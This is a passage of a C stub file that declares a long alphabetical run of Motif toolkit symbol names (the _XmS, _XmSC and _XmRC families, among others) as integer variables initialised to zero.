int XmQTmotifTrait = 0;
|
||||
int XmQTnavigator = 0;
|
||||
int XmQTpointIn = 0;
|
||||
int XmQTscrollFrame = 0;
|
||||
int XmQTspecifyLayoutDirection = 0;
|
||||
int XmQTspecifyRenderTable = 0;
|
||||
int XmQTspecifyUnhighlight = 0;
|
||||
int XmQTspecifyUnitType = 0;
|
||||
int XmQTtakesDefault = 0;
|
||||
int XmQTtoolTip = 0;
|
||||
int XmQTtoolTipConfig = 0;
|
||||
int XmQTtransfer = 0;
|
||||
int XmQTtraversalControl = 0;
|
||||
int _XmQualifyLabelLocalCache = 0;
|
||||
int _XmQueryPixmapCache = 0;
|
||||
int _XmQueueCount = 0;
|
||||
int _XmQueueFree = 0;
|
||||
int _XmQueueInit = 0;
|
||||
int _XmQueuePop = 0;
|
||||
int _XmRCAdaptToSize = 0;
|
||||
int _XmRC_AddPopupEventHandlers = 0;
|
||||
int _XmRC_AddToPostFromList = 0;
|
||||
int _XmRCArmAndActivate = 0;
|
||||
int _XmRC_CheckAndSetOptionCascade = 0;
|
||||
int _XmRCColorHook = 0;
|
||||
int _XmRCDoMarginAdjustment = 0;
|
||||
int _XmRC_DoProcessMenuTree = 0;
|
||||
int _XmRC_GadgetTraverseDown = 0;
|
||||
int _XmRC_GadgetTraverseLeft = 0;
|
||||
int _XmRC_GadgetTraverseRight = 0;
|
||||
int _XmRC_GadgetTraverseUp = 0;
|
||||
int _XmRCGetKidGeo = 0;
|
||||
int _XmRC_GetLabelString = 0;
|
||||
int _XmRC_GetMenuAccelerator = 0;
|
||||
int _XmRC_GetMnemonicCharSet = 0;
|
||||
int _XmRCGetTopManager = 0;
|
||||
int _XmRC_KeyboardInputHandler = 0;
|
||||
int _XmRCMenuProcedureEntry = 0;
|
||||
int _XmRC_menuSystemRecord = 0;
|
||||
int _XmRC_PostTimeOut = 0;
|
||||
int _XmRCPreferredSize = 0;
|
||||
int _XmRC_ProcessSingleWidget = 0;
|
||||
int _XmRC_RemoveFromPostFromList = 0;
|
||||
int _XmRC_RemoveFromPostFromListOnDestroyCB = 0;
|
||||
int _XmRC_RemoveHandlersFromPostFromWidget = 0;
|
||||
int _XmRC_RemovePopupEventHandlers = 0;
|
||||
int _XmRCSetKidGeo = 0;
|
||||
int _XmRC_SetMenuHistory = 0;
|
||||
int _XmRC_SetOptionMenuHistory = 0;
|
||||
int _XmRC_SetOrGetTextMargins = 0;
|
||||
int _XmRCThinkAboutSize = 0;
|
||||
int _XmRC_UpdateOptionMenuCBG = 0;
|
||||
int _XmReadDragBuffer = 0;
|
||||
int _XmReadDSFromStream = 0;
|
||||
int _XmReadImageAndHotSpotFromFile = 0;
|
||||
int _XmReadInitiatorInfo = 0;
|
||||
int _XmReasonToMessageType = 0;
|
||||
int _XmReCacheLabG = 0;
|
||||
int _XmReCacheLabG_r = 0;
|
||||
int _XmRecordEvent = 0;
|
||||
int _XmRedisplayGadgets = 0;
|
||||
int _XmRedisplayHBar = 0;
|
||||
int _XmRedisplayLabG = 0;
|
||||
int _XmRedisplayVBar = 0;
|
||||
int _XmRegionClear = 0;
|
||||
int _XmRegionComputeExtents = 0;
|
||||
int _XmRegionCreate = 0;
|
||||
int _XmRegionCreateSize = 0;
|
||||
int _XmRegionDestroy = 0;
|
||||
int _XmRegionDrawShadow = 0;
|
||||
int _XmRegionEqual = 0;
|
||||
int _XmRegionFromImage = 0;
|
||||
int _XmRegionGetExtents = 0;
|
||||
int _XmRegionGetNumRectangles = 0;
|
||||
int _XmRegionGetRectangles = 0;
|
||||
int _XmRegionIntersect = 0;
|
||||
int _XmRegionIntersectRectWithRegion = 0;
|
||||
int _XmRegionIsEmpty = 0;
|
||||
int _XmRegionOffset = 0;
|
||||
int _XmRegionPointInRegion = 0;
|
||||
int _XmRegionSetGCRegion = 0;
|
||||
int _XmRegionShrink = 0;
|
||||
int _XmRegionSubtract = 0;
|
||||
int _XmRegionUnion = 0;
|
||||
int _XmRegionUnionRectWithRegion = 0;
|
||||
int _XmRegisterConverters = 0;
|
||||
int XmRegisterConverters = 0;
|
||||
int _XmRegisterPixmapConverters = 0;
|
||||
int XmRegisterSegmentEncoding = 0;
|
||||
int _XmRemoveAllCallbacks = 0;
|
||||
int _XmRemoveCallback = 0;
|
||||
int XmRemoveFromPostFromList = 0;
|
||||
int _XmRemoveGrab = 0;
|
||||
int _XmRemoveHashEntry = 0;
|
||||
int _XmRemoveHashIterator = 0;
|
||||
int XmRemoveProtocolCallback = 0;
|
||||
int XmRemoveProtocols = 0;
|
||||
int XmRemoveTabGroup = 0;
|
||||
int _Xm_RemQueue = 0;
|
||||
int _XmRenderCacheGet = 0;
|
||||
int _XmRenderCacheSet = 0;
|
||||
int XmRenderTableAddRenditions = 0;
|
||||
int XmRenderTableCopy = 0;
|
||||
int XmRenderTableCvtFromProp = 0;
|
||||
int XmRenderTableCvtToProp = 0;
|
||||
int _XmRenderTableDisplay = 0;
|
||||
int _XmRenderTableFindFallback = 0;
|
||||
int _XmRenderTableFindFirstFont = 0;
|
||||
int _XmRenderTableFindRendition = 0;
|
||||
int XmRenderTableFree = 0;
|
||||
int XmRenderTableGetDefaultFontExtents = 0;
|
||||
int XmRenderTableGetRendition = 0;
|
||||
int XmRenderTableGetRenditions = 0;
|
||||
int XmRenderTableGetTags = 0;
|
||||
int _XmRenderTableRemoveRenditions = 0;
|
||||
int XmRenderTableRemoveRenditions = 0;
|
||||
int _XmRenditionCopy = 0;
|
||||
int _XmRenditionCreate = 0;
|
||||
int XmRenditionCreate = 0;
|
||||
int XmRenditionFree = 0;
|
||||
int _XmRenditionMerge = 0;
|
||||
int XmRenditionRetrieve = 0;
|
||||
int XmRenditionUpdate = 0;
|
||||
int _XmReOrderResourceList = 0;
|
||||
int XmRepTypeAddReverse = 0;
|
||||
int XmRepTypeGetId = 0;
|
||||
int XmRepTypeGetNameList = 0;
|
||||
int XmRepTypeGetRecord = 0;
|
||||
int XmRepTypeGetRegistered = 0;
|
||||
int _XmRepTypeInstallConverters = 0;
|
||||
int XmRepTypeInstallTearOffModelConverter = 0;
|
||||
int XmRepTypeRegister = 0;
|
||||
int XmRepTypeValidValue = 0;
|
||||
int _XmRequestNewSize = 0;
|
||||
int _XmResetTravGraph = 0;
|
||||
int _XmResizeHashTable = 0;
|
||||
int _XmResizeObject = 0;
|
||||
int _XmResizeWidget = 0;
|
||||
int XmResolveAllPartOffsets = 0;
|
||||
int XmResolveAllPartOffsets64 = 0;
|
||||
int XmResolvePartOffsets = 0;
|
||||
int _XmRestoreCoreClassTranslations = 0;
|
||||
int _XmRestoreExcludedTearOffToToplevelShell = 0;
|
||||
int _XmRestoreTearOffToMenuShell = 0;
|
||||
int _XmRestoreTearOffToToplevelShell = 0;
|
||||
int _XmRootGeometryManager = 0;
|
||||
int _XmRowColumn_bar_table = 0;
|
||||
int xmRowColumnClassRec = 0;
|
||||
int _XmRowColumn_menu_table = 0;
|
||||
int _XmRowColumn_menu_traversal_table = 0;
|
||||
int _XmRowColumn_option_table = 0;
|
||||
int xmRowColumnWidgetClass = 0;
|
||||
int _XmSaccelerator = 0;
|
||||
int _XmSacceleratorText = 0;
|
||||
int _XmSactivateCallback = 0;
|
||||
int _XmSadjustLast = 0;
|
||||
int _XmSadjustMargin = 0;
|
||||
int _XmSalignment = 0;
|
||||
int _XmSallowOverlap = 0;
|
||||
int _XmSallowResize = 0;
|
||||
int _XmSanimationMask = 0;
|
||||
int _XmSanimationPixmap = 0;
|
||||
int _XmSanimationPixmapDepth = 0;
|
||||
int _XmSanimationStyle = 0;
|
||||
int _XmSapplyCallback = 0;
|
||||
int _XmSapplyLabelString = 0;
|
||||
int _XmSarmCallback = 0;
|
||||
int _XmSarmColor = 0;
|
||||
int _XmSarmPixmap = 0;
|
||||
int _XmSarrowDirection = 0;
|
||||
int xmSashClassRec = 0;
|
||||
int _XmSash_defTranslations = 0;
|
||||
int xmSashWidgetClass = 0;
|
||||
int _XmSattachment = 0;
|
||||
int _XmSaudibleWarning = 0;
|
||||
int _XmSautomaticSelection = 0;
|
||||
int _XmSautoShowCursorPosition = 0;
|
||||
int _XmSautoUnmanage = 0;
|
||||
int _XmSavailability = 0;
|
||||
int _XmSaveCoreClassTranslations = 0;
|
||||
int _XmSaveMenuProcContext = 0;
|
||||
int _XmSblendModel = 0;
|
||||
int _XmSblinkRate = 0;
|
||||
int _XmSbottomAttachment = 0;
|
||||
int _XmSbottomOffset = 0;
|
||||
int _XmSbottomPosition = 0;
|
||||
int _XmSbottomShadowColor = 0;
|
||||
int _XmSbottomShadowPixmap = 0;
|
||||
int _XmSbottomWidget = 0;
|
||||
int _XmSbrowseSelectionCallback = 0;
|
||||
int _XmSbuttonAccelerators = 0;
|
||||
int _XmSbuttonAcceleratorText = 0;
|
||||
int _XmSbuttonCount = 0;
|
||||
int _XmSbuttonFontList = 0;
|
||||
int _XmSbuttonMnemonicCharSets = 0;
|
||||
int _XmSbuttonMnemonics = 0;
|
||||
int _XmSbuttons = 0;
|
||||
int _XmSbuttonSet = 0;
|
||||
int _XmSbuttonType = 0;
|
||||
int _XmSCAccelerator = 0;
|
||||
int _XmSCAcceleratorText = 0;
|
||||
int _XmSCAdjustLast = 0;
|
||||
int _XmSCAdjustMargin = 0;
|
||||
int xmScaleClassRec = 0;
|
||||
int _XmScaleGetTitleString = 0;
|
||||
int XmScaleGetValue = 0;
|
||||
int XmScaleSetTicks = 0;
|
||||
int XmScaleSetValue = 0;
|
||||
int xmScaleWidgetClass = 0;
|
||||
int _XmSCAlignment = 0;
|
||||
int _XmSCAllowOverlap = 0;
|
||||
int _XmScancelButton = 0;
|
||||
int _XmScancelCallback = 0;
|
||||
int _XmScancelLabelString = 0;
|
||||
int _XmSCAnimationMask = 0;
|
||||
int _XmSCAnimationPixmap = 0;
|
||||
int _XmSCAnimationPixmapDepth = 0;
|
||||
int _XmSCAnimationStyle = 0;
|
||||
int _XmScanningCacheGet = 0;
|
||||
int _XmScanningCacheSet = 0;
|
||||
int _XmSCApplyLabelString = 0;
|
||||
int _XmSCArmCallback = 0;
|
||||
int _XmSCArmColor = 0;
|
||||
int _XmSCArmPixmap = 0;
|
||||
int _XmSCArrowDirection = 0;
|
||||
int _XmScascadeButton = 0;
|
||||
int _XmScascadePixmap = 0;
|
||||
int _XmScascadingCallback = 0;
|
||||
int _XmSCAtomList = 0;
|
||||
int _XmSCAttachment = 0;
|
||||
int _XmSCAudibleWarning = 0;
|
||||
int _XmSCAutomaticSelection = 0;
|
||||
int _XmSCAutoShowCursorPosition = 0;
|
||||
int _XmSCAutoUnmanage = 0;
|
||||
int _XmSCAvailability = 0;
|
||||
int _XmSCBackgroundPixmap = 0;
|
||||
int _XmSCBlendModel = 0;
|
||||
int _XmSCBlinkRate = 0;
|
||||
int _XmSCBooleanDimension = 0;
|
||||
int _XmSCBottomShadowColor = 0;
|
||||
int _XmSCBottomShadowPixmap = 0;
|
||||
int _XmSCButtonAccelerators = 0;
|
||||
int _XmSCButtonAcceleratorText = 0;
|
||||
int _XmSCButtonCount = 0;
|
||||
int _XmSCButtonFontList = 0;
|
||||
int _XmSCButtonMnemonicCharSets = 0;
|
||||
int _XmSCButtonMnemonics = 0;
|
||||
int _XmSCButtons = 0;
|
||||
int _XmSCButtonSet = 0;
|
||||
int _XmSCButtonType = 0;
|
||||
int _XmSCCallbackProc = 0;
|
||||
int _XmSCCancelLabelString = 0;
|
||||
int _XmSCChar = 0;
|
||||
int _XmSCCharSetTable = 0;
|
||||
int _XmSCChildHorizontalAlignment = 0;
|
||||
int _XmSCChildHorizontalSpacing = 0;
|
||||
int _XmSCChildPlacement = 0;
|
||||
int _XmSCChildren = 0;
|
||||
int _XmSCChildType = 0;
|
||||
int _XmSCChildVerticalAlignment = 0;
|
||||
int _XmSCClientData = 0;
|
||||
int _XmSCClipWindow = 0;
|
||||
int _XmSCColumns = 0;
|
||||
int _XmSCCommandWindow = 0;
|
||||
int _XmSCCommandWindowLocation = 0;
|
||||
int _XmSCCompoundText = 0;
|
||||
int _XmSCConvertProc = 0;
|
||||
int _XmSCCursorBackground = 0;
|
||||
int _XmSCCursorForeground = 0;
|
||||
int _XmSCCursorPosition = 0;
|
||||
int _XmSCCursorPositionVisible = 0;
|
||||
int _XmSCDarkThreshold = 0;
|
||||
int _XmSCDecimalPoints = 0;
|
||||
int _XmSCDefaultButtonShadowThickness = 0;
|
||||
int _XmSCDefaultButtonType = 0;
|
||||
int _XmSCDefaultCopyCursorIcon = 0;
|
||||
int _XmSCDefaultFontList = 0;
|
||||
int _XmSCDefaultInvalidCursorIcon = 0;
|
||||
int _XmSCDefaultLinkCursorIcon = 0;
|
||||
int _XmSCDefaultMoveCursorIcon = 0;
|
||||
int _XmSCDefaultNoneCursorIcon = 0;
|
||||
int _XmSCDefaultPosition = 0;
|
||||
int _XmSCDefaultSourceCursorIcon = 0;
|
||||
int _XmSCDefaultValidCursorIcon = 0;
|
||||
int _XmSCDeleteResponse = 0;
|
||||
int _XmSCDesktopParent = 0;
|
||||
int _XmSCDialogStyle = 0;
|
||||
int _XmSCDialogTitle = 0;
|
||||
int _XmSCDialogType = 0;
|
||||
int _XmSCDirectory = 0;
|
||||
int _XmSCDirectoryValid = 0;
|
||||
int _XmSCDirListItemCount = 0;
|
||||
int _XmSCDirListItems = 0;
|
||||
int _XmSCDirListLabelString = 0;
|
||||
int _XmSCDirMask = 0;
|
||||
int _XmSCDirSearchProc = 0;
|
||||
int _XmSCDirSpec = 0;
|
||||
int _XmSCDisarmCallback = 0;
|
||||
int _XmSCDoubleClickInterval = 0;
|
||||
int _XmSCDragContextClass = 0;
|
||||
int _XmSCDragDropFinishCallback = 0;
|
||||
int _XmSCDragIconClass = 0;
|
||||
int _XmSCDragInitiatorProtocolStyle = 0;
|
||||
int _XmSCDragMotionCallback = 0;
|
||||
int _XmSCDragOperations = 0;
|
||||
int _XmSCDragOverMode = 0;
|
||||
int _XmSCDragProc = 0;
|
||||
int _XmSCDragReceiverProtocolStyle = 0;
|
||||
int _XmSCDropProc = 0;
|
||||
int _XmSCDropRectangles = 0;
|
||||
int _XmSCDropSiteActivity = 0;
|
||||
int _XmSCDropSiteEnterCallback = 0;
|
||||
int _XmSCDropSiteLeaveCallback = 0;
|
||||
int _XmSCDropSiteManagerClass = 0;
|
||||
int _XmSCDropSiteOperations = 0;
|
||||
int _XmSCDropSiteType = 0;
|
||||
int _XmSCDropStartCallback = 0;
|
||||
int _XmSCDropTransferClass = 0;
|
||||
int _XmSCDropTransfers = 0;
|
||||
int _XmSCEditable = 0;
|
||||
int _XmSCEntryBorder = 0;
|
||||
int _XmSCEntryClass = 0;
|
||||
int _XmSCExportTargets = 0;
|
||||
int _XmSCExposeCallback = 0;
|
||||
int _XmSCExtensionType = 0;
|
||||
int _XmSCFileListItemCount = 0;
|
||||
int _XmSCFileListItems = 0;
|
||||
int _XmSCFileListLabelString = 0;
|
||||
int _XmSCFileSearchProc = 0;
|
||||
int _XmSCFileTypeMask = 0;
|
||||
int _XmSCFillOnArm = 0;
|
||||
int _XmSCFillOnSelect = 0;
|
||||
int _XmSCFilterLabelString = 0;
|
||||
int _XmSCFontList = 0;
|
||||
int _XmSCFONTLIST_DEFAULT_TAG_STRING = 0;
|
||||
int _XmSCForegroundThreshold = 0;
|
||||
int _XmSCGadgetPixmap = 0;
|
||||
int _XmScheckButton = 0;
|
||||
int _XmSCHelpLabelString = 0;
|
||||
int _XmSCHighlightColor = 0;
|
||||
int _XmSCHighlightOnEnter = 0;
|
||||
int _XmSCHighlightPixmap = 0;
|
||||
int _XmSCHighlightThickness = 0;
|
||||
int _XmSchildHorizontalAlignment = 0;
|
||||
int _XmSchildHorizontalSpacing = 0;
|
||||
int _XmSchildPlacement = 0;
|
||||
int _XmSchildPosition = 0;
|
||||
int _XmSchildType = 0;
|
||||
int _XmSchildVerticalAlignment = 0;
|
||||
int _XmSCHorizontalDimension = 0;
|
||||
int _XmSCHorizontalFontUnit = 0;
|
||||
int _XmSCHorizontalInt = 0;
|
||||
int _XmSCHorizontalPosition = 0;
|
||||
int _XmSCHorizontalScrollBar = 0;
|
||||
int _XmSCHot = 0;
|
||||
int _XmSCICCHandle = 0;
|
||||
int _XmSCIconAttachment = 0;
|
||||
int _XmSCImportTargets = 0;
|
||||
int _XmSCIncrement = 0;
|
||||
int _XmSCIncremental = 0;
|
||||
int _XmSCIndicatorOn = 0;
|
||||
int _XmSCIndicatorSize = 0;
|
||||
int _XmSCIndicatorType = 0;
|
||||
int _XmSCInitialDelay = 0;
|
||||
int _XmSCInitialFocus = 0;
|
||||
int _XmSCInputCreate = 0;
|
||||
int _XmSCInputMethod = 0;
|
||||
int _XmSCInvalidCursorForeground = 0;
|
||||
int _XmSCIsAligned = 0;
|
||||
int _XmSCIsHomogeneous = 0;
|
||||
int _XmSCISO8859_DASH_1 = 0;
|
||||
int _XmSCItemCount = 0;
|
||||
int _XmSCItems = 0;
|
||||
int _XmSCKeyboardFocusPolicy = 0;
|
||||
int _XmSCKeySym = 0;
|
||||
int _XmSCKeySymTable = 0;
|
||||
int _XmSCLabelFontList = 0;
|
||||
int _XmSCLabelInsensitivePixmap = 0;
|
||||
int _XmSCLabelPixmap = 0;
|
||||
int _XmSCLabelString = 0;
|
||||
int _XmSCLabelType = 0;
|
||||
int _XmSclientData = 0;
|
||||
int _XmSCLightThreshold = 0;
|
||||
int _XmSclipWindow = 0;
|
||||
int _XmSCListLabelString = 0;
|
||||
int _XmSCListMarginHeight = 0;
|
||||
int _XmSCListMarginWidth = 0;
|
||||
int _XmSCListSizePolicy = 0;
|
||||
int _XmSCListSpacing = 0;
|
||||
int _XmSCListUpdated = 0;
|
||||
int _XmSCLogicalParent = 0;
|
||||
int _XmSCMainWindowMarginHeight = 0;
|
||||
int _XmSCMainWindowMarginWidth = 0;
|
||||
int _XmSCManBottomShadowPixmap = 0;
|
||||
int _XmSCManForegroundPixmap = 0;
|
||||
int _XmSCManHighlightPixmap = 0;
|
||||
int _XmSCManTopShadowPixmap = 0;
|
||||
int _XmSCMappingDelay = 0;
|
||||
int _XmSCMarginBottom = 0;
|
||||
int _XmSCMarginHeight = 0;
|
||||
int _XmSCMarginLeft = 0;
|
||||
int _XmSCMarginRight = 0;
|
||||
int _XmSCMarginTop = 0;
|
||||
int _XmSCMarginWidth = 0;
|
||||
int _XmSCMask = 0;
|
||||
int _XmSCMaximum = 0;
|
||||
int _XmSCMaxItems = 0;
|
||||
int _XmSCMaxLength = 0;
|
||||
int _XmSCMaxValue = 0;
|
||||
int _XmSCMenuBar = 0;
|
||||
int _XmSCMenuPost = 0;
|
||||
int _XmSCMenuWidget = 0;
|
||||
int _XmSCMessageProc = 0;
|
||||
int _XmSCMessageWindow = 0;
|
||||
int _XmSCMinimizeButtons = 0;
|
||||
int _XmSCMinimum = 0;
|
||||
int _XmSCMnemonic = 0;
|
||||
int _XmSCMnemonicCharSet = 0;
|
||||
int _XmSCMoveOpaque = 0;
|
||||
int _XmSCMultiClick = 0;
|
||||
int _XmSCMustMatch = 0;
|
||||
int _XmSCMwmDecorations = 0;
|
||||
int _XmSCMwmFunctions = 0;
|
||||
int _XmSCMwmInputMode = 0;
|
||||
int _XmSCMwmMenu = 0;
|
||||
int _XmSCMwmMessages = 0;
|
||||
int _XmSCNavigationType = 0;
|
||||
int _XmSCNeedsMotion = 0;
|
||||
int _XmSCNoMatchString = 0;
|
||||
int _XmSCNoneCursorForeground = 0;
|
||||
int _XmSCNoResize = 0;
|
||||
int _XmSCNotifyProc = 0;
|
||||
int _XmSCNumChildren = 0;
|
||||
int _XmSCNumColumns = 0;
|
||||
int _XmSCNumDropRectangles = 0;
|
||||
int _XmSCNumDropTransfers = 0;
|
||||
int _XmSCNumExportTargets = 0;
|
||||
int _XmSCNumImportTargets = 0;
|
||||
int _XmSCOffset = 0;
|
||||
int _XmSCOkLabelString = 0;
|
||||
int _XmScolumns = 0;
|
||||
int _XmScommand = 0;
|
||||
int _XmScommandChangedCallback = 0;
|
||||
int _XmScommandEnteredCallback = 0;
|
||||
int _XmScommandWindow = 0;
|
||||
int _XmScommandWindowLocation = 0;
|
||||
int _XmSconvertProc = 0;
|
||||
int _XmSCOperationChangedCallback = 0;
|
||||
int _XmSCOperationCursorIcon = 0;
|
||||
int _XmSCOptionLabel = 0;
|
||||
int _XmSCOptionMnemonic = 0;
|
||||
int _XmSCOutputCreate = 0;
|
||||
int _XmSCPacking = 0;
|
||||
int _XmSCPageIncrement = 0;
|
||||
int _XmSCPaneMaximum = 0;
|
||||
int _XmSCPaneMinimum = 0;
|
||||
int _XmSCPattern = 0;
|
||||
int _XmSCPendingDelete = 0;
|
||||
int _XmSCPopupEnabled = 0;
|
||||
int _XmSCPositionIndex = 0;
|
||||
int _XmSCPostFromButton = 0;
|
||||
int _XmSCPostFromCount = 0;
|
||||
int _XmSCPostFromList = 0;
|
||||
int _XmSCPreeditType = 0;
|
||||
int _XmSCPrimForegroundPixmap = 0;
|
||||
int _XmSCProc = 0;
|
||||
int _XmSCProcessingDirection = 0;
|
||||
int _XmSCPromptString = 0;
|
||||
int _XmSCProtocolCallback = 0;
|
||||
int _XmSCPushButtonEnabled = 0;
|
||||
int _XmSCQualifySearchDataProc = 0;
|
||||
int _XmSCRadioAlwaysOne = 0;
|
||||
int _XmSCRadioBehavior = 0;
|
||||
int _XmSCRecomputeSize = 0;
|
||||
int _XmSCRectangleList = 0;
|
||||
int _XmSCRectangles = 0;
|
||||
int xmScreenClass = 0;
|
||||
int xmScreenClassRec = 0;
|
||||
int _XmScreenGetOperationIcon = 0;
|
||||
int _XmScreenGetSourceIcon = 0;
|
||||
int _XmScreenGetStateIcon = 0;
|
||||
int xmScreenObjectClass = 0;
|
||||
int _XmScreenRemoveFromCursorCache = 0;
|
||||
int _XmSCRepeatDelay = 0;
|
||||
int _XmSCResizeCallback = 0;
|
||||
int _XmSCResizeHeight = 0;
|
||||
int _XmSCResizePolicy = 0;
|
||||
int _XmSCResizeWidth = 0;
|
||||
int xmScrollBarClassRec = 0;
|
||||
int _XmScrollBar_defaultTranslations = 0;
|
||||
int XmScrollBarGetValues = 0;
|
||||
int XmScrollBarSetValues = 0;
|
||||
int xmScrollBarWidgetClass = 0;
|
||||
int xmScrolledWindowClassRec = 0;
|
||||
int XmScrolledWindowSetAreas = 0;
|
||||
int xmScrolledWindowWidgetClass = 0;
|
||||
int _XmScrolledW_ScrolledWindowXlations = 0;
|
||||
int XmScrollVisible = 0;
|
||||
int _XmSCRowColumnType = 0;
|
||||
int _XmSCRows = 0;
|
||||
int _XmSCRubberPositioning = 0;
|
||||
int _XmSCSashHeight = 0;
|
||||
int _XmSCSashIndent = 0;
|
||||
int _XmSCSashWidth = 0;
|
||||
int _XmSCScaleHeight = 0;
|
||||
int _XmSCScaleMultiple = 0;
|
||||
int _XmSCScaleWidth = 0;
|
||||
int _XmSCScroll = 0;
|
||||
int _XmSCScrollBarDisplayPolicy = 0;
|
||||
int _XmSCScrollBarPlacement = 0;
|
||||
int _XmSCScrolledWindowMarginHeight = 0;
|
||||
int _XmSCScrolledWindowMarginWidth = 0;
|
||||
int _XmSCScrollingPolicy = 0;
|
||||
int _XmSCScrollSide = 0;
|
||||
int _XmSCSelectColor = 0;
|
||||
int _XmSCSelectedItemCount = 0;
|
||||
int _XmSCSelectedItems = 0;
|
||||
int _XmSCSelectInsensitivePixmap = 0;
|
||||
int _XmSCSelectionArrayCount = 0;
|
||||
int _XmSCSelectionLabelString = 0;
|
||||
int _XmSCSelectionPolicy = 0;
|
||||
int _XmSCSelectionType = 0;
|
||||
int _XmSCSelectPixmap = 0;
|
||||
int _XmSCSelectThreshold = 0;
|
||||
int _XmSCSeparatorOn = 0;
|
||||
int _XmSCSeparatorType = 0;
|
||||
int _XmSCSet = 0;
|
||||
int _XmSCShadowThickness = 0;
|
||||
int _XmSCShadowType = 0;
|
||||
int _XmSCShellHorizDim = 0;
|
||||
int _XmSCShellHorizPos = 0;
|
||||
int _XmSCShellUnitType = 0;
|
||||
int _XmSCShellVertDim = 0;
|
||||
int _XmSCShellVertPos = 0;
|
||||
int _XmSCShowArrows = 0;
|
||||
int _XmSCShowAsDefault = 0;
|
||||
int _XmSCShowSeparator = 0;
|
||||
int _XmSCShowValue = 0;
|
||||
int _XmSCSimpleCheckBox = 0;
|
||||
int _XmSCSimpleMenuBar = 0;
|
||||
int _XmSCSimpleOptionMenu = 0;
|
||||
int _XmSCSimplePopupMenu = 0;
|
||||
int _XmSCSimplePulldownMenu = 0;
|
||||
int _XmSCSimpleRadioBox = 0;
|
||||
int _XmSCSizePolicy = 0;
|
||||
int _XmSCSliderSize = 0;
|
||||
int _XmSCSource = 0;
|
||||
int _XmSCSourceCursorIcon = 0;
|
||||
int _XmSCSourceIsExternal = 0;
|
||||
int _XmSCSourcePixmapIcon = 0;
|
||||
int _XmSCSourceWidget = 0;
|
||||
int _XmSCSourceWindow = 0;
|
||||
int _XmSCSpacing = 0;
|
||||
int _XmSCStartTime = 0;
|
||||
int _XmSCStateCursorIcon = 0;
|
||||
int _XmSCStringDirection = 0;
|
||||
int _XmSCTearOffModel = 0;
|
||||
int _XmSCTextFontList = 0;
|
||||
int _XmSCTextString = 0;
|
||||
int _XmSCTextValue = 0;
|
||||
int _XmSCTitleString = 0;
|
||||
int _XmSCTopCharacter = 0;
|
||||
int _XmSCTopItemPosition = 0;
|
||||
int _XmSCTopLevelEnterCallback = 0;
|
||||
int _XmSCTopLevelLeaveCallback = 0;
|
||||
int _XmSCTopShadowColor = 0;
|
||||
int _XmSCTopShadowPixmap = 0;
|
||||
int _XmSCTransferProc = 0;
|
||||
int _XmSCTransferStatus = 0;
|
||||
int _XmSCTraversalOn = 0;
|
||||
int _XmSCTraversalType = 0;
|
||||
int _XmSCTreeUpdateProc = 0;
|
||||
int _XmSCTroughColor = 0;
|
||||
int _XmSCUnitType = 0;
|
||||
int _XmSCUnpostBehavior = 0;
|
||||
int _XmSCUnselectPixmap = 0;
|
||||
int _XmSCUpdateSliderSize = 0;
|
||||
int _XmScursorBackground = 0;
|
||||
int _XmScursorForeground = 0;
|
||||
int _XmScursorPosition = 0;
|
||||
int _XmScursorPositionVisible = 0;
|
||||
int _XmSCUseAsyncGeometry = 0;
|
||||
int _XmSCUserData = 0;
|
||||
int _XmSCValidCursorForeground = 0;
|
||||
int _XmSCValueChangedCallback = 0;
|
||||
int _XmSCValueWcs = 0;
|
||||
int _XmSCVerifyBell = 0;
|
||||
int _XmSCVerticalAlignment = 0;
|
||||
int _XmSCVerticalDimension = 0;
|
||||
int _XmSCVerticalFontUnit = 0;
|
||||
int _XmSCVerticalInt = 0;
|
||||
int _XmSCVerticalPosition = 0;
|
||||
int _XmSCVerticalScrollBar = 0;
|
||||
int _XmSCVirtualBinding = 0;
|
||||
int _XmSCVisibleItemCount = 0;
|
||||
int _XmSCVisibleWhenOff = 0;
|
||||
int _XmSCVisualPolicy = 0;
|
||||
int _XmSCWhichButton = 0;
|
||||
int _XmSCWordWrap = 0;
|
||||
int _XmSCWorkWindow = 0;
|
||||
int _XmSCXmBackgroundPixmap = 0;
|
||||
int _XmSCXmFONTLIST_DEFAULT_TAG_STRING = 0;
|
||||
int _XmSCXmString = 0;
|
||||
int _XmSCXmStringCharSet = 0;
|
||||
int _XmSCXmStringTable = 0;
|
||||
int _XmSdarkThreshold = 0;
|
||||
int _XmSdecimalPoints = 0;
|
||||
int _XmSdecrementCallback = 0;
|
||||
int _XmSdefaultActionCallback = 0;
|
||||
int _XmSDEFAULT_BACKGROUND = 0;
|
||||
int _XmSdefaultButton = 0;
|
||||
int _XmSdefaultButtonShadowThickness = 0;
|
||||
int _XmSdefaultButtonType = 0;
|
||||
int _XmSdefaultCopyCursorIcon = 0;
|
||||
int _XmSDEFAULT_FONT = 0;
|
||||
int _XmSdefaultFontList = 0;
|
||||
int _XmSdefaultInvalidCursorIcon = 0;
|
||||
int _XmSdefaultLinkCursorIcon = 0;
|
||||
int _XmSdefaultMoveCursorIcon = 0;
|
||||
int _XmSdefaultNoneCursorIcon = 0;
|
||||
int _XmSdefaultPosition = 0;
|
||||
int _XmSdefaultSourceCursorIcon = 0;
|
||||
int _XmSdefaultValidCursorIcon = 0;
|
||||
int _XmSdeleteResponse = 0;
|
||||
int _XmSdesktopParent = 0;
|
||||
int _XmSdialogStyle = 0;
|
||||
int _XmSdialogTitle = 0;
|
||||
int _XmSdialogType = 0;
|
||||
int _XmSdirectory = 0;
|
||||
int _XmSdirectoryValid = 0;
|
||||
int _XmSdirListItemCount = 0;
|
||||
int _XmSdirListItems = 0;
|
||||
int _XmSdirListLabelString = 0;
|
||||
int _XmSdirMask = 0;
|
||||
int _XmSdirSearchProc = 0;
|
||||
int _XmSdirSpec = 0;
|
||||
int _XmSdisarmCallback = 0;
|
||||
int _XmSdoubleClickInterval = 0;
|
||||
int _XmSdoubleSeparator = 0;
|
||||
int _XmSdragCallback = 0;
|
||||
int _XmSdragContextClass = 0;
|
||||
int _XmSdragDropFinishCallback = 0;
|
||||
int _XmSdragIconClass = 0;
|
||||
int _XmSdragInitiatorProtocolStyle = 0;
|
||||
int _XmSdragMotionCallback = 0;
|
||||
int _XmSdragOperations = 0;
|
||||
int _XmSdragOverMode = 0;
|
||||
int _XmSdragProc = 0;
|
||||
int _XmSdragReceiverProtocolStyle = 0;
|
||||
int _XmSdropFinishCallback = 0;
|
||||
int _XmSdropProc = 0;
|
||||
int _XmSdropRectangles = 0;
|
||||
int _XmSdropSiteActivity = 0;
|
||||
int _XmSdropSiteEnterCallback = 0;
|
||||
int _XmSdropSiteLeaveCallback = 0;
|
||||
int _XmSdropSiteManagerClass = 0;
|
||||
